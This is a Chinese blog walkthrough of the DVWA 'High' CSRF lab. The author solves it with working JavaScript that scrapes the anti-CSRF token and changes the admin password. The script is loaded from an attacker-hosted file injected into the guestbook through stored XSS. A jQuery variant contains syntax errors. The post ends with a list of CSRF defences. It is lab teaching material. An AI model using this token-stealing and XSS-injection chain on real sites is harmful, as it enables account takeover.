DVWA中CSRF高级

最新推荐文章于 2025-06-30 11:04:11 发布
最新推荐文章于 2025-06-30 11:04:11 发布
阅读量1k 收藏 8
点赞数 25
CC 4.0 BY-SA版权
文章标签: csrf 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zj2084/article/details/146285981

一、High级过关

1、访问CSRF页面,在页面的源代码中可以看到生成的Token

2、过关的核心

过关方案的核心在于要发送请求给http://10.37.129.2/DVWA/vulnerabilities/csrf/页面,然后从响应中取得Token(通过正则表达式可以提取出来的),取得后再将Token和新密码一起发送给http://10.37.129.2/DVWA/vulnerabilities/?user_token=TOKEN&password_new=123456&password_conf=123456&Change=Change页面完成密码修改

3、构造JS代码

先构造一个javascript原生代码发送AJAX请求的代码:

var tokenUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/';
var count = 0;
//示例化XMLHttpRequest,用于发送AJAX请求
xmlhttp = new XMLHttpRequest();
    //当请求的状态发生变化时,触发执行代码
    xmlhttp.onreadystatechange = function(){
        //状态码:0:请求未初始化,1:服务器连接已成立,2:请求已接收,3:请求处理中,4:请求已完成,且响应已就绪
        if(xmlhttp.readyState == 4 && xmlhttp.status == 200)
        {
            //取得请求的响应,并从响应中通过正则提取Token
            var text = xmlhttp.responseText;
            var regex = /user_token\' value\=\'(.*?)\' \/\>/;
            var match = text.match(regex);
            //alert(match[1]);
            var token = match[1];
            //发送修改密码的语法
            var changeUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/?user_token='+token+'&password_new=123456&password_conf=123456&Change=Change';
            if (count == 0){
                count =1; //只发送一次,否则会多次发送
                xmlhttp.open("GET",changeUrl,false);  //false代表同步方式发送
                xmlhttp.send();
            }
        }
    };
xmlhttp.open("GET",tokenUrl,false);
xmlhttp.send();

将上述javascript代码放置于攻击服务器上,如:http://10.211.55.16/csrf.js

想办法将上述JS代码嵌入到被攻击服务者服务器上即可完成。(而这一步,在High级无法实现)

因为在High级,时屏蔽了<script>标签的,所以无法直接使用

所以我们的解决方法是:先切换到low级,在留言本里面注入以下脚本,然后再切换到High级,直接触发改密。

<script src="http://10.211.55.16/csrf.js?"+Math.random()></script>

 

 我们发现Message那个地方,我们输入的东西的长度大于那个框所允许输入的长度

所以接下来我们先打开F12,将这个框的maxlength改为500

然后重新将我们的<script>代码输入进去,点击Sign Guestbook,发现保存成功

 看一下数据库里进去没有,发现已经输入进去啦

然后我们点击切换到高级,就能完成改密啦

 我们之前的密码是password,新密码是123456,让我们验证一下密码是否被修改

当我们输入admin,password的时候告诉我们密码不正确

 当我们输入admin,123456的时候,告诉我们密码正确

可以使用Fidder完整监听整个过程,也可以使用浏览器F12调试模式进行处理。 

思考:为什么此处要使用javascript原生代码来发送请求,使用JQuery不是更简单吗?

var script = document.createElement("script");
script.type="text/javascript";
script.src="http://10.211.55.16/jquery-3.4.1.min.js";
document.getElementsByTagName('head')[0].appendChild(script);

setTimeout(function)() {
    $(document).ready(function(){
        var tokenUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/';
        $.get(tokenUrl,function(data){
            var regex = /user_token\' value\=\'(.*?)\' \/\>/;
            var match = data.match(regex);
            var token = match[1];
            var changeUrl = 'http://10.37.129.2/DVWA/vulnerabilities/csrf/?user_token='+token+'&password_new=123456&password_conf=123456&Change=Change';
            $.get(changeurl,function(data){
                alert('done');
            });
        });
     });
},500);

 二、CSRF防御

(1)避免在URL中明文显示特定操作的参数内容;

(2)使用同步令牌(Synchronizer Token),检查客户端请求是否包含令牌及其有效性;(常用的做法,并且保证每次Token的值完全随机且每次不同)

(3)检查Referer Header,拒绝来自非本网站的直接URL请求。

(4)不要在客户端保存敏感信息(比如身份认证信息);

(5)设置会话过期机制,比如20分钟无操作,直接登录超时退出;

(6)敏感信息的修改时需要对身份进行二次确认,比如修改账号时,需要判断旧密码;

(7)敏感信息的修改使用post而不是get

(8)避免交叉漏洞,如XSS等

(9)禁止跨域访问

(10)在响应中设置CSP (Content-Security-Police)内容安全策略

章鱼先生.
关注
DVWA-CSRF跨站请求伪造 -High级别
xmj818719的博客
02-27 1724
基础知识介绍csrf攻击流程 实验环境: CSRF模拟攻击环境(这里是内网环境,公网只需要对端口进行映射即可,其他操作同理) CentOS7 DVWA服务器(模拟转账系统) 192.168.0.9 kali 黑客(攻击者) 192.168.0.2 Win10 用户(受害者) 192.168.0.5 1使用条件: 1、使用关闭XSS的chrome浏览器 新建chrome浏览器快捷方式 “C:\Program Files (x86)\Google\Chrome\chrome-xss.e
网络安全最全DVWACSRF高级_dvwa csrf 高级
2401_84302369的博客
05-04 426
页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给页面完成密码修改(4)先构造一个Javascript原生代码发送AJAX请求的代码将上述代码放置在攻击服务器上想办法将上述JS代码嵌入到被攻击者服务器上即可完成。(High级别无法实现)在high级别中,屏蔽了处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。
DVWA靶场通关笔记-CSRF(High级别)
最新发布
mooyuan的网络安全博客
06-30 927
本系列为通过《DVWA靶场通关笔记》的CSRF关卡(low,medium,high,impossible共4关)渗透集合,通过对相应关卡源码的代码审计找到讲解渗透原理并进行渗透实践,本文为跨站请求伪造CSRF High关卡的渗透部分。
DVWA csrf高级
weixin_69374202的博客
05-25 425
受害者主机ip 192.168.11.59(虚拟机)攻击者主机ip : 192.168.11.30(物理机)测试网络连通性。
DVWACSRF_全级别
weixin_45378289的博客
07-04 418
1.low级别 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass
DVWACSRF
RexHa的博客
09-30 8918
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWA-CSRF-High
没有网络安全就没有国家安全
08-20 961
本篇文章主要讲解DVWA靶场中的CSRF高级
DVWA 靶场CSRF通关
m0_65761158的博客
07-10 827
添加了一个generateSessionToken()函数,用户每次访问修改密码时服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。服务器收到修改密码的请求后,会检查参数password_new与password_conf是否相同,如果相同,就会修改密码。修改密码abc123之后就会在地址栏出现相应的链接可以发现是get型所以提交的参数会所以显示,并提示密码修改成功。可以看到密码已修改成功。
DVWA靶场通关----(三)CSRF
m0_74977101的博客
02-04 903
攻击者诱骗用户浏览器向目标网站发送一个“伪造的请求”(如转账、修改密码),利用用户已登录的会话权限完成恶意操作。
dvwa+csrf高级
10-14
DVWA中,可以通过模拟CSRF攻击来学习和理解这种漏洞的工作原理和防御方法。 高级CSRF攻击通常涉及到一些复杂的技术,例如利用JavaScript代码来构造恶意请求、使用多个跨域站点进行攻击等。为了防止这种攻击,开发...
DVWACSRF-High跨站请求伪造高级
qq_39330735的博客
02-09 596
DVWACSRF-High跨站请求伪造高级,通过XSS漏洞联合使用的方法来实现。
dvwa_csrf攻击_high
weixin_30492601的博客
02-18 379
dvwa_csrf攻击_high <script type="text/javascript"> function attack() { document.getElementsByName('user_token')[0].value=document.getElementById("hack")....
代码审计—DVWACSRF—high
王嘟嘟的博客
10-31 1012
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.youkuaiyun.com/qq_36869808/article/details/83029980 0x01 start 1.黑盒测试 发现这里带了Token。 说实话我不会利用,哈哈。直接白盒看看吧。 白盒 通过和这个来判断Token,但是这里网上都说可以通过xss来获取session来进行判断。然后进行伪造等等,但...
DVWA全级别教程学习及备课笔记:之CSRF
lm19770429的专栏
10-05 399
CSRF(Cross-site request forgery) CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。 在2013年发布的新版OWASP Top 10
新手指南:DVWA-1.9全级别教程之CSRF
weixin_50464560的博客
03-19 583
目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,并且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分...
零基础怎么学python?(1)
2401_84302655的博客
04-30 928
如果对Python感兴趣的话,可以试试我的学习方法以及相关的学习资料Python所有方向的学习路线Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。二、Python必备开发工具。
DVWA系列之17 CSRF***介绍与实施
weixin_34318272的博客
12-24 120
CSRF(Cross-Site Request Forgery)跨站点请求伪造,这种***方式的特点是:***者盗用你的身份,以你的名义进行某些非法操作。CSRF能够使用你的帐户发送邮件,获取你的敏感信息,甚至盗走你的财产。当我们打开或登录某个网站后,在浏览器与网站之间将会产生一个会话,在这个会话没有结束时,你就可以利用你的权限对网站进行某些操作,如:发表文章、发送邮件、删除文章等。当这个会话结束...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值